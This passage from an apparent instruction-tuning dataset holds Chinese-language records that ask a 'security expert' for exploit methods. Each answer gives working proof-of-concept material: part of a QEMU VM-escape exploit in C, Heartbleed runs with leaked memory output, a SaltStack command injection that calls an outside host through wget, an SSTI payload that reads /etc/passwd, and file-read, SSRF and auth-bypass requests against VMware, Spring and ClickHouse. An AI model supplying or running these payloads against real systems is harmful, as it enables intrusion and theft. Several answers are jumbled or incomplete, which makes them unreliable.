addr));\n}\n\nvoid init(){\nint mmio_fd = open(\"/sys/devices/pci0000:00/0000:00:05.7/resource0\", O_RDWR | O_SYNC);\n    if (mmio_fd == -1)\n        die(\"mmio_fd open failed\");\n\nmmio_mem = mmap(0, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED, mmio_fd, 0);\n    if (mmio_mem == MAP_FAILED)\n        die(\"mmap mmio_mem failed\");\n\ndmabuf = mmap(0, 0x3000, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, -1, 0);\n    if (dmabuf == MAP_FAILED)\n        die(\"mmap\");\n    mlock(dmabuf, 0x3000);\nhcca=dmabuf;\ndmabuf32=dmabuf+4;\nqtd=dmabuf+0x200;\nqh=dmabuf+0x100;\nsetup_buf=dmabuf+0x300;\n}\n\nvoid init_state(){\nmmio_write(0x64,0x100);\nmmio_write(0x64,0x4);\nqh->epchar=0x00;\nqh->token=1<<7;\nqh->current_qtd=virt2phys(dmabuf+0x200);\nstruct EHCIqtd * qtd;\nqtd=dmabuf+0x200;\nqtd->token=1<<7 | 2<<8 | 8<<16;\nqtd->bufptr[0]=virt2phys(dmabuf+0x300);\nsetup_buf[6]=0xff;\nsetup_buf[7]=0x0;\ndmabuf32[0]=virt2phys(dmabuf+0x100)+0x2;\nmmio_write(0x28,0x0);\nmmio_write(0x30,0x0);\nmmio_write(0x38,virt2phys(dmabuf));\nmmio_write(0x34,virt2phys(dmabuf));\nmmio_write(0x20,0x11);\n}\n\nvoid set_length(uint16_t len,uint8_t in){\nmmio_write(0x64,0x100);\nmmio_write(0x64,0x4);\nsetup_buf[0]=in;\nsetup_buf[6]=len&0xff;\nsetup_buf[7]=(len>>8)&0xff;\nqh->epchar=0x00;\nqh->token=1<<7;\nqh->current_qtd=virt2phys(dmabuf+0x200);\n\nqtd->token=1<<7 | 2<<8 | 8<<16;\nqtd->bufptr[0]=virt2phys(dmabuf+0x300);\ndmabuf32[0]=virt2phys(dmabuf+0x100)+0x2;\nmmio_write(0x28,0x0);\nmmio_write(0x30,0x0);\nmmio_write(0x38,virt2phys(dmabuf));\nmmio_write(0x34,virt2phys(dmabuf));\nmmio_write(0x20,0x11);\n}\n\nvoid do_copy_read(){\nmmio_write(0x64,0x100);\nmmio_write(0x64,0x4);\n\nqh->epchar=0x00;\nqh->token=1<<7;\nqh->current_qtd=virt2phys(dmabuf+0x200);\nqtd->token=1<<7 | 1<<8 | 0x1f00<<16;\nqtd->bufptr[0]=virt2phys(dmabuf+0x1000);\nqtd->bufptr[1]=virt2phys(dmabuf+0x2000);\ndmabuf32[0]=virt2phys(dmabuf+0x100)+0x2;\nmmio_write(0x28,0x0);\nmmio_write(0x30,0x0);\nmmio_write(0x38,virt2phys(dmabuf));\nmmio_write(0x34,virt2phys(dmabuf));\nmmio_write(0x20,0x11);\n}\n\nint main()\n{\n    init();\n    iopl(3);\n    outw(0,0xc0c0);\n    outw(0,0xc0e0);\n    outw(0,0xc010);\n    outw(0,0xc0a0);\n    sleep(3);\n    init_state();\n    sleep(2);\n    set_length(0x2000,0x80);\n    sleep(2);\n    do_copy_read();\n    sleep(2);\n    struct USBDevice* usb_device_tmp=dmabuf+0x2004;\n    struct USBDevice usb_device;\n    memcpy(&usb_device,usb_device_tmp,sizeof(USBDevice));\n    uint64_t dev_addr=usb_device.ep_ctl.dev;\n    uint64_t *tmp=dmabuf+0x24f4;\n    long long base=*tmp;\n    if(base == 0){\n        printf(\"INIT DOWN,DO IT AGAIN\");\n        return 0;\n}\n    base-=0xee5480-0x2668c0;\n    uint64_t system=base+0x2d9610;\n    puts(\"\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\");\n    printf(\"LEAK BASE ADDRESS:%llx!\\n\",base);\n    printf(\"LEAK SYSTEM ADDRESS:%llx!\\n\",system);\n    puts(\"\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\");\n}\n2. [QEMU CVE-2020-14364 POC 视频演示](https://v.qq.com/x/page/w3141fini4b.html)\n", "category": "poc_server_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "服务器应用漏洞/QEMU 虚拟机逃逸漏洞 CVE-2020-14364.md"}
    539. 

  539. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:VMware vCenter 任意文件读取漏洞\n漏洞描述:VMware vCenter特定版本存在任意文件读取漏洞,攻击者通过构造特定的请求,可以读取服务器上任意文件、\n影响版本:``` VMware vCenter Server 6.5.0a- f 版本 ```\n网络测绘:``` title=\"ID_VC_Welcome\" ```\n", "input": "", "output": "【漏洞类型】server_application_vulnerability\n【POC利用方法】\n1. VMware vCenter Server 6.5.0a- f 版本\n2. title=\"ID_VC_Welcome\"\n3. http://xxx.xxx.xxx.xxx/eam/vib?id=C:\\ProgramData\\VMware\\vCenterServer\\cfg\\vmware-vpx\\vcdb.properties\n", "category": "poc_server_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "服务器应用漏洞/VMware vCenter 任意文件读取漏洞.md"}
    540. 

  540. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:VMware vRealize Operations Manager SSRF漏洞 CVE-2021-21975\n漏洞描述:vRealize Operations Manager API包含服务器端请求伪造。可以通过网络访问vRealize Operations Manager API的恶意攻击者可以执行服务器端请求伪造攻击(SSRF),以窃取管理凭据。\n影响版本:``` VMware:vRealize_operations_manager: 8.0.0, 8.0.1, 8.3.0, 8.1.0, 8.1.1, 8.2.0, 7.5.0 VMware:cloud_foundation: 4.x 3.x VMware:vRealize_suite_lifecycle_manager: 8.x ```\n网络测绘:``` title=\"vRealize Operations Manager\" ```\n", "input": "", "output": "【漏洞类型】server_application_vulnerability\n【CVE编号】CVE-2021-21975\n【POC利用方法】\n1. VMware:vRealize_operations_manager: 8.0.0, 8.0.1, 8.3.0, 8.1.0, 8.1.1, 8.2.0, 7.5.0\nVMware:cloud_foundation: 4.x 3.x\nVMware:vRealize_suite_lifecycle_manager: 8.x\n2. title=\"vRealize Operations Manager\"\n3. POST /casa/nodes/thumbprints HTTP/1.1\nHost: xxx.xxx.xxx.xxx\nContent-Type: application/json;charset=UTF-8\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nContent-Length: 24\n\n\n[\"eheeyd.dnslog.cn\"]\n", "category": "poc_server_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "服务器应用漏洞/VMware vRealize Operations Manager SSRF漏洞 CVE-2021-21975.md"}
    541. 

  541. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:OpenSSL 心脏滴血漏洞 CVE-2014-0160\n漏洞描述:2014年4月7日,OpenSSL发布安全公告,在OpenSSL1.0.1版本至OpenSSL1.0.1f Beta1版本中存在漏洞,该漏洞中文名称为心脏滴血,英文名称为HeartBleed。其中Heart是指该漏洞位于心跳协议上,Bleed是因为该漏洞会造成数据泄露。即HeartBleed是在心跳协议上的一个数据泄露漏洞,OpenSSL库中用到了该心跳协议。HeartBleed主要存在与OpenSSL的1.0.1版本到1.0.1f版本。\n影响版本:``` OpenSSL1.0.1、1.0.1a、1.0.1b、1.0.1c、1.0.1d、1.0.1e、1.0.1f、Beta 1 of OpenSSL 1.0.2等版本 ```\n", "input": "", "output": "【漏洞类型】server_application_vulnerability\n【CVE编号】CVE-2014-0160\n【POC利用方法】\n1. OpenSSL1.0.1、1.0.1a、1.0.1b、1.0.1c、1.0.1d、1.0.1e、1.0.1f、Beta 1 of OpenSSL 1.0.2等版本\n2. https://github.com/vulhub/vulhub.git\ncd vulhub/openssl/heartbleed\ndocker-compose up -d\n3. msf5 > use auxiliary/scanner/ssl/openssl_heartbleed\nmsf5 auxiliary(scanner/ssl/openssl_heartbleed) > show options\n\nModule options (auxiliary/scanner/ssl/openssl_heartbleed):\n\n   Name              Current Setting  Required  Description\n   ----              ---------------  --------  -----------\n   DUMPFILTER                         no        Pattern to filter leaked memory before storing\n   LEAK_COUNT        1                yes       Number of times to leak memory per SCAN or DUMP invocation\n   MAX_KEYTRIES      50               yes       Max tries to dump key\n   RESPONSE_TIMEOUT  10               yes       Number of seconds to wait for a server response\n   RHOSTS                             yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'\n   RPORT             443              yes       The target port (TCP)\n   STATUS_EVERY      5                yes       How many retries until key dump status\n   THREADS           1                yes       The number of concurrent threads (max one per host)\n   TLS_CALLBACK      None             yes       Protocol to use, \"None\" to use raw TLS sockets (Accepted: None, SMTP, IMAP, JABBER, POP3, FTP, POSTGRES)\n   TLS_VERSION       1.0              yes       TLS/SSL version to use (Accepted: SSLv3, 1.0, 1.1, 1.2)\n\n\nAuxiliary action:\n\n   Name  Description\n   ----  -----------\n   SCAN  Check hosts for vulnerability\n\n\nmsf5 auxiliary(scanner/ssl/openssl_heartbleed) > set rhost 192.168.51.133\nrhost => 192.168.51.133\nmsf5 auxiliary(scanner/ssl/openssl_heartbleed) > set  verbose true\nverbose => true\nmsf5 auxiliary(scanner/ssl/openssl_heartbleed) > run\n                                                                                                                                                                                                                                           \n[*] 192.168.51.133:443    - Leaking heartbeat response #1                                                                                                                                                                                  \n[*] 192.168.51.133:443    - Sending Client Hello...                                                                                                                                                                                        \n[*] 192.168.51.133:443    - SSL record #1:                                                                                                                                                                                                 \n[*] 192.168.51.133:443    -     Type:    22                                                                                                                                                                                                \n[*] 192.168.51.133:443    -     Version: 0x0301                                                                                                                                                                                            \n[*] 192.168.51.133:443    -     Length:  86                                                                                                                                                                                                \n[*] 192.168.51.133:443    -     Handshake #1:                                                                                                                                                                                              \n[*] 192.168.51.133:443    -             Length: 82                                                                                                                                                                                         \n[*] 192.168.51.133:443    -             Type:   Server Hello (2)                                                                                                                                                                           \n[*] 192.168.51.133:443    -             Server Hello Version:           0x0301                                                                                                                                                             \n[*] 192.168.51.133:443    -             Server Hello random data:       5fd46996727a4e50c0e2eaecf52d1592384aaa6870d4d65eea8b6b34eb47a389\n[*] 192.168.51.133:443    -             Server Hello Session ID length: 32\n[*] 192.168.51.133:443    -             Server Hello Session ID:        66e9cacbefcb28955de31c38bd9dff93de153a6d6247fa117ebc3f2f091d6f74\n[*] 192.168.51.133:443    - SSL record #2:\n[*] 192.168.51.133:443    -     Type:    22\n[*] 192.168.51.133:443    -     Version: 0x0301\n[*] 192.168.51.133:443    -     Length:  822\n[*] 192.168.51.133:443    -     Handshake #1:\n[*] 192.168.51.133:443    -             Length: 818\n[*] 192.168.51.133:443    -             Type:   Certificate Data (11)\n[*] 192.168.51.133:443    -             Certificates length: 815\n[*] 192.168.51.133:443    -             Data length: 818\n[*] 192.168.51.133:443    -             Certificate #1:\n[*] 192.168.51.133:443    -                     Certificate #1: Length: 812\n[*] 192.168.51.133:443    -                     Certificate #1: #<OpenSSL::X509::Certificate: subject=#<OpenSSL::X509::Name CN=localhost,O=Dis,L=Springfield,ST=Denial,C=US>, issuer=#<OpenSSL::X509::Name CN=localhost,O=Dis,L=Springfield,ST=Denial,C=US>, serial=#<OpenSSL::BN:0x00007efe8154c028>, not_before=2020-08-09 17:03:46 UTC, not_after=2021-08-09 17:03:46 UTC>\n[*] 192.168.51.133:443    - SSL record #3:\n[*] 192.168.51.133:443    -     Type:    22\n[*] 192.168.51.133:443    -     Version: 0x0301\n[*] 192.168.51.133:443    -     Length:  331\n[*] 192.168.51.133:443    -     Handshake #1:\n[*] 192.168.51.133:443    -             Length: 327\n[*] 192.168.51.133:443    -             Type:   Server Key Exchange (12)\n[*] 192.168.51.133:443    - SSL record #4:\n[*] 192.168.51.133:443    -     Type:    22\n[*] 192.168.51.133:443    -     Version: 0x0301\n[*] 192.168.51.133:443    -     Length:  4\n[*] 192.168.51.133:443    -     Handshake #1:\n[*] 192.168.51.133:443    -             Length: 0\n[*] 192.168.51.133:443    -             Type:   Server Hello Done (14)\n[*] 192.168.51.133:443    - Sending Heartbeat...\n[*] 192.168.51.133:443    - Heartbeat response, 65535 bytes\n[+] 192.168.51.133:443    - Heartbeat response with leak, 65535 bytes\n[*] 192.168.51.133:443    - Printable info leaked:\n......_...DV.\\....G...{.vc..i ..Gv.'....f.....\".!.9.8.........5.............................3.2.....E.D...../...A.......................................w.....#.'.g.@.r.v.........8.........2.....E.D.......Q.......P.=...<.......A...............................#.............*.(.........................................+........-.....3.&.$... 3.<.]...et1......L.D.L%*.V8....{............................................................................................................................................jectReference\" type=\"ServiceInstance\">ServiceInstance</_this></RetrieveServiceContent></soap:Body></soap:Envelope>W&V.b...?....|.y..................................................................................................................................... repeated 15479 times .....................................................................................................................................@..................................................................................................................................... repeated 16122 times .....................................................................................................................................@.................................................................................................................................................................................................................................................................................................................................QA......h.......h.........7.RV....7.RV..................................................................................................................................... repeated 4129 times .....................................................................................................................................0......X.......X.........................7.RV..............................RV..=.c.RV.. .7.RV..x.7.RV....7.RV....7.RV..x.7.RV..x.7.RV..h.7.RV....7.RV....7.RV..192.168.51.146 - - [12/Dec/2020:06:47:40 +0000] \"POST /sdk HTTP/1.1\" 404 170 \"-\" \"Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)\".org/book/nse.html)\"..................................................................................................................................... repeated 3184 times .....................................................................................................................................Q ........................7.RV....7.RV..................................................................................................................................... repeated 7539 times .....................................................................................................................................@..........................................................................................................................................................................................................................................................................................................................................@.......................................................................................................................................................................................................$4.RV..................................@....... .......0.8.RV..........`.......0........$4.RV..jfx...&...~.RV..........PA......`....... '..RV..@d4.RV....................2.RV....................2.RV..........................1.................8.RV..........................1...............................................!...............h....... ...............m..U`.W.....O.>c.....E^X4........kr[..:.1...z[..x.W].........f...3h.qS.&K.(A*q*...].tx.b....X........Np....l.F...5....~..Z2.D..$........................................................................................................................................1.......x.......x.......P.2.RV....2.RV..0.......0.......>#NQ[.8.].......&.i2y.x.I....iOk........a....... '..RV..`.2.RV..................0.2.RV....................2.RV......................;P.e.........................U.6.&`.Ks..w>V.. ^..N..z....z...M.+..n/i..C...D......a..2.p..<.....}k.W:.Eq....Ui*I.X...m...-..x..3}.5NM............... .......P.2.RV..................1.........t.............................0....................V..>...I5.F......!.3Xhy.4.....r.....h.d..b........).......3.....&......IE...c,8.T.~..H.P.{y.....CK.,!&..;..vw....H.C...q....%e..{.XT.jq.R.r.....RHw..57.COlB..|......@...*.G(3..-N..P....mLO..]./.,9..|..+2.Lh..q..dF.m...'.....`...S.8........Q...U.0....I................................................................................................................................................................................................................................................................................ '..RV.. .8.RV..`.2.RV....................8.RV.................................. .2.RV....................2.RV............................................2.RV....................2.RV.......................... .2.RV.. .2.RV..................h.......h.........8.RV....8.RV..................................................................................................................................... repeated 745 times .....................................................................................................................................#8.RV..`.2.RV........!.3Xhy.4.....r.....h.d..b........).......3.....&......IE...c,8.T.~..H.P.{y.....CK.,!&..;..vw....H.C...q....%e..{.XT.jq.R.r.....RHw..57.COlB..|......@...*.G(3..-N..P....mLO..]./.,9..|..+2.Lh..q..dF.m...'.....`...S.8........Q...U.0....I ..................................................................................................................................... repeated 277 times .....................................................................................................................................X.......`.2.RV..........................................................P...........RV............................................................................................................................................................................................................................................................................................................................................2.RV..X..................................................................................................................................... repeated 437 times .....................................................................................................................................A.......X.........1.RV..................................................................................................................................................................................................................................................................................................................................X.......X..................................................................................................................................... repeated 429 times .....................................................................................................................................x.......!.......X.......X..................................................................................................................................... repeated 1942 times .....................................................................................................................................@..........V...R.._.i.rzNP.....-..8J.hp..^..k4.G.. f.....(.]..8......:mbG..~.?/..ot...................6...2../..,0..(0...........j..0...*.H........0V1.0...U....US1.0...U....Denial1.0...U....Springfield1.0...U....Dis1.0...U....localhost0...200809170346Z..210809170346Z0V1.0...U....US1.0...U....Denial1.0...U....Springfield1.0...U....Dis1.0...U....localhost0..\"0...*.H.............0.........8...;....../t.....^.....P..=....w.*b.a>.8.Q.?.$.c.......{G. ........l..i...D..V....0......B..J..Y.c.wO.....M.Df..R....\".4.u...............P.><7d}VK4^.$.S..U..u..R7l.+.H....;.V\\.w.?..).........[....M..3......?..e...WBI^..&.'.nhV!.......V.;...y..+&tm.c1..3-.....0...*.H..............>.c..|.s(......,..H.1..0.=l`...(2..Sb.......`...c....5J....v..uj.*^i.$6^..a3.s.......v...\\....M.pK.9....t.&...|y...u1.......u..M..%.+..{e....G..~.v.D.6...............=).3{......r/.\"vz..a.U..5-.5.=......l..ud......Nx...n..$h...4.G.~b.LU.Y...37..e....%.w.......K...G...A....~m.h,......qz>}uA.^)..A.&}o@..'...y.]..V..S..JY........Y/.u|....$.n.T._.b\\\\c...o.]....L.h...v*....z..D..?Kq9hJ.kT....?.....=......su....p.S...j.e.....-N}.S...x..Z.....t.;Z...n=.1.......J.1n.l...w. .l.d.W. .........8..`.>O........t...r..~.A$..R...v.8......x.\\o<.....#hS......Vz.6....V..l....-.....,n...p.(..L.w.7h3...3..................................................................................................................................... repeated 6250 times .....................................................................................................................................\n[*] 192.168.51.133:443    - Scanned 1 of 1 hosts (100% complete)\n[*] Auxiliary module execution completed\n", "category": "poc_server_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "服务器应用漏洞/OpenSSL 心脏滴血漏洞 CVE-2014-0160.md"}
    542. 

  542. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:SaltStack 未授权访问命令执行漏洞 CVE-2020-16846 25592\n漏洞描述:2020年11月4日,SaltStack 官方发布了一则安全更新公告,其中CVE-2020-16846和CVE-2020-25592组合使用可在未授权的情况下通过salt-api接口执行任意命令。CVE-2020-25592允许任意用户调用SSH模块,CVE-2020-16846允许用户执行任意命令。salt-api虽不是默认开启配置,但绝大多数SaltStack用户会选择开启salt-api,故存在较高风险。\n影响版本:``` SaltStack Version 3002 SaltStack Version 3001.1, 3001.2 SaltStack Version 3000.3, 3000.4 SaltStack Version 2019.2.5, 2019.2.6 SaltStack Version 2018.3.5 SaltStack Version 2017.7.4, 2017.7.8 SaltStack Version 2016.11.3, 2016.11.6,2016.11.10 SaltStack Version 2016.3.4, 2016.3.6,2016.3.8 SaltStack Version 2015.8.10, 2015.8.13 ```\n", "input": "", "output": "【漏洞类型】server_application_vulnerability\n【CVE编号】CVE-2020-16846\n【POC利用方法】\n1. SaltStack Version 3002\nSaltStack Version 3001.1, 3001.2\nSaltStack Version 3000.3, 3000.4\nSaltStack Version 2019.2.5, 2019.2.6\nSaltStack Version 2018.3.5\nSaltStack Version 2017.7.4, 2017.7.8\nSaltStack Version 2016.11.3, 2016.11.6,2016.11.10\nSaltStack Version 2016.3.4, 2016.3.6,2016.3.8\nSaltStack Version 2015.8.10, 2015.8.13\n2. git clone https://github.com/vulhub/vulhub.git\ncd vulhub/saltstack/CVE-2020-16846\ndocker-compose up -d\n3. POST /run HTTP/1.1\nHost: 127.0.0.1:8000\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:68.0) Gecko/20100101 Firefox/68.0\nAccept: application/x-yaml\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nDNT: 1\nConnection: close\nUpgrade-Insecure-Requests: 1\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 109\n\ntoken=12312&client=ssh&tgt=*&fun=a&roster=whip1ash&ssh_priv=aaa|wget http://xxx.dnslog.cn\n", "category": "poc_server_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "服务器应用漏洞/SaltStack 未授权访问命令执行漏洞 CVE-2020-16846 25592.md"}
    543. 

  543. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:ClickHouse API 数据库接口未授权访问漏洞\n漏洞描述:ClickHouse API 数据库接口存在未授权访问漏洞,攻击者通过漏洞可以执行任意SQL命令获取数据库数据\n影响版本:``` ClickHouse ```\n网络测绘:``` \"ClickHouse\" && body=\"ok\" ```\n", "input": "", "output": "【漏洞类型】server_application_vulnerability\n【POC利用方法】\n1. \"ClickHouse\" && body=\"ok\"\n2. http://your-ip:8123/?query=SELECT%20*%20FROM%20system.query_thread_log%20LIMIT%201%20FORMAT%20Vertical\n3. http://your-ip:8123/?query=SHOW%20DATABASES\n", "category": "poc_server_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "服务器应用漏洞/ClickHouse API 数据库接口未授权访问漏洞.md"}
    544. 

  544. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Windows Chrome 远程命令执行漏洞\n漏洞描述:Windows Chrome 0day  在 2021-4-13 被公开 该漏洞未绕过沙箱,需要关闭沙箱才能成功弹出计算器 ``` 右键图标-->属性,然后在目标后面加上 -no-sandbox 点击确认 ```\n影响版本:``` Window Chrome 浏览器 ```\n", "input": "", "output": "【漏洞类型】server_application_vulnerability\n【POC利用方法】\n1. # 关闭沙箱\n右键图标-->属性,然后在目标后面加上 -no-sandbox\n点击确认\n2. Window Chrome 浏览器\n3. <script src=\"exploit.js\"></script>\n", "category": "poc_server_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "服务器应用漏洞/Windows Chrome 远程命令执行漏洞.md"}
    545. 

  545. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:VMware Spring Security 身份认证绕过漏洞 CVE-2022-22978\n漏洞描述:VMware Spring Security是美国威睿(VMware)公司的一套为基于Spring的应用程序提供说明性安全保护的安全框架。VMware Spring Security存在授权问题漏洞,该漏洞源于在应用程序中使用 RegexRequestMatcher 以及正则表达式的通配符(**.**)处理不受信任的输入时存在输入验证错误。 参考链接: - https://xz.aliyun.com/t/11473\n影响版本:``` Spring Security 5.5.x < 5.5.7 Spring Security 5.6.x < 5.6.4 Spring Security 其他低版本同样受影响 ```\n", "input": "", "output": "【漏洞类型】server_application_vulnerability\n【CVE编号】CVE-2022-22978\n【POC利用方法】\n1. Spring Security 5.5.x < 5.5.7 \nSpring Security 5.6.x < 5.6.4 \nSpring Security 其他低版本同样受影响\n2. /admin/%0a%0d\n3. GET /admin/%0atest HTTP/1.1\n", "category": "poc_server_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "服务器应用漏洞/VMware Spring Security 身份认证绕过漏洞 CVE-2022-22978.md"}
    546. 

  546. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:VMware Workspace ONE Access SSTI漏洞 CVE-2022-22954\n漏洞描述:VMware Workspace ONE Access(以前称为VMware Identity Manager)旨在通过多因素身份验证、条件访问和单点登录,让您的员工更快地访问SaaS、Web和本机移动应用程序。其中的CVE-2022-22954是一个匿名服务器模板注入漏洞,未经身份验证的攻击者可以利用此漏洞进行远程任意代码执行。\n影响版本:``` VMware Workspace ONE Access Appliance (版本号:20.10.0.0 ,20.10.0.1 ,21.08.0.0 ,21.08.0.1 ) VMware Identity Manager Appliance (版本号:3.3.3 , 3.3.4 , 3.3.5 ,3.3.6) VMware Realize Automation (版本号:7.6) ```\n网络测绘:``` app=\"vmware-Workspace-ONE-Access\" ```\n", "input": "", "output": "【漏洞类型】server_application_vulnerability\n【CVE编号】CVE-2022-22954\n【POC利用方法】\n1. VMware Workspace ONE Access Appliance (版本号:20.10.0.0 ,20.10.0.1 ,21.08.0.0 ,21.08.0.1 )\nVMware Identity Manager Appliance (版本号:3.3.3 , 3.3.4 , 3.3.5 ,3.3.6)\nVMware Realize Automation (版本号:7.6)\n2. app=\"vmware-Workspace-ONE-Access\"\n3. /catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%22%29%7d\n", "category": "poc_server_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "服务器应用漏洞/VMware Workspace ONE Access SSTI漏洞 CVE-2022-22954.md"}
    547. 

  547. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:VoIPmonitor 远程命令执行漏洞 CVE-2021-30461\n漏洞描述:VoIPmonitor是“具有在Linux上运行的SIP RTP和RTCP VoIP协议的具有商业前端的开源网络数据包嗅探器”。 使用通过Web界面到达的用户提供的数据,允许未经身份验证的远程用户触发VoIPmonitor中的远程PHP代码执行漏洞。\n影响版本:``` VoIPmonitor < 24.60 ```\n网络测绘:``` \"VoIPmonitor\" ```\n", "input": "", "output": "【漏洞类型】server_application_vulnerability\n【CVE编号】CVE-2021-30461\n【POC利用方法】\n1. VoIPmonitor < 24.60\n2. \"VoIPmonitor\"\n3. $setConfigurationTypeValue_rslt = array();\nif(file_exists('config/configuration.php')) {\n\t$existsConfiguration = true;\n\tif(isset($_POST['recheck'])) {\n\t\tif(!empty($_POST['SPOOLDIR'])) {\n\t\t\tsetConfigurationTypeValue__index('SPOOLDIR', $_POST['SPOOLDIR']);\n\t\t}\n\t}\n", "category": "poc_server_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "服务器应用漏洞/VoIPmonitor 远程命令执行漏洞 CVE-2021-30461.md"}
    548. 

  548. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:NVIDIA GPU显示驱动程序 信息泄露 CVE-2021-1056\n漏洞描述:用于Linux的NVIDIA GPU显示驱动程序在内核模式层(`nvidia.ko`)中包含一个漏洞,在该漏洞中,它没有完全遵守操作系统文件系统提供GPU设备级隔离的权限,这可能导致拒绝服务或信息泄露。\n影响版本:``` NVIDIA GPU显示驱动程序 ```\n", "input": "", "output": "【漏洞类型】server_application_vulnerability\n【CVE编号】CVE-2021-1056\n【POC利用方法】\n1. NVIDIA GPU显示驱动程序\n2. git clone https://github.com/pokerfaceSad/CVE-2021-1056.git\ncd CVE-2021-1056\ndocker run --gpus 1 -v $PWD:/CVE-2021-1056 -it tensorflow/tensorflow:1.13.2-gpu bash\n3. In Container# nvidia-smi\nSat Jan  9 07:21:03 2021       \n+-----------------------------------------------------------------------------+\n| NVIDIA-SMI 450.51.05    Driver Version: 450.51.05    CUDA Version: 11.0     |\n|-------------------------------+----------------------+----------------------+\n| GPU  Name        Persistence-M| Bus-Id        Disp.A | Volatile Uncorr. ECC |\n| Fan  Temp  Perf  Pwr:Usage/Cap|         Memory-Usage | GPU-Util  Compute M. |\n|                               |                      |               MIG M. |\n|===============================+======================+======================|\n|   0  Tesla V100-PCIE...  Off  | 00000000:02:00.0 Off |                    0 |\n| N/A   27C    P0    23W / 250W |      0MiB / 32510MiB |      0%      Default |\n|                               |                      |                  N/A |\n+-------------------------------+----------------------+----------------------+\n\n+-----------------------------------------------------------------------------+\n| Processes:                                                                  |\n|  GPU   GI   CI        PID   Type   Process name                  GPU Memory |\n|        ID   ID                                                   Usage      |\n|=============================================================================|\n|  No running processes found                                                 |\n+-----------------------------------------------------------------------------+\n", "category": "poc_server_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "服务器应用漏洞/NVIDIA GPU显示驱动程序 信息泄露 CVE-2021-1056.md"}
    549. 

  549. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:向日葵 check 远程命令执行漏洞 CNVD-2022-10270\n漏洞描述:向日葵通过发送特定的请求获取CID后,可调用 check接口实现远程命令执行,导致服务器权限被获取\n影响版本:``` 11.0.0.33162 ```\n网络测绘:``` body=\"Verification failure\" ```\n", "input": "", "output": "【漏洞类型】server_application_vulnerability\n【POC利用方法】\n1. 11.0.0.33162\n2. body=\"Verification failure\"\n3. /cgi-bin/rpc?action=verify-haras\n", "category": "poc_server_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "服务器应用漏洞/向日葵 check 远程命令执行漏洞 CNVD-2022-10270.md"}
    550. 

  550. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Hashicorp Consul Service API远程命令执行漏洞\n漏洞描述:2018年11月27日,Consul在官方博客中发布了关于Consul工具在特定配置下可能导致远程命令执行(RCE)漏洞的公告,并描述了防护该漏洞的配置方案。 Consul是HashiCorp公司推出的一款开源工具,用于实现分布式系统的服务发现与配置。与其他分布式服务注册与发现的方案相比,Consul提供的方案更为“一站式”。Consul内置了服务注册与发现框架、分布一致性协议实现、健康检查、Key/Value存储、多数据中心方案,不再需要依赖其他工具(例如ZooKeeper等),使用方式也相对简单。 Consul使用Go语言编写,因此具有天然的可移植性(支持Linux、Windows和Mac OS X系统);且安装包中仅包含一个可执行文件,便于部署,可与Docker等轻量级容器无缝配合。 在特定配置下,恶意攻击者可以通过发送精心构造的HTTP请求在未经授权的情况下在Consul服务端远程执行命令。\n影响版本:启用了脚本检查参数(-enable-script-checks)的所有版本\n", "input": "", "output": "【漏洞类型】server_application_vulnerability\n【POC利用方法】\n1. #开启脚本检测功能,该功能开启后漏洞才存在\nconsul.exe agent -dev -client <your-target-ip>  -enable-script-checks\n2. http://your-target-ip:port/v1/agent/self\n3. msf6 > search Hashicorp\nmsf6 > use exploit/multi/misc/consul_service_exec\n", "category": "poc_server_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "服务器应用漏洞/Hashicorp Consul Service API远程命令执行漏洞.md"}
    551. 

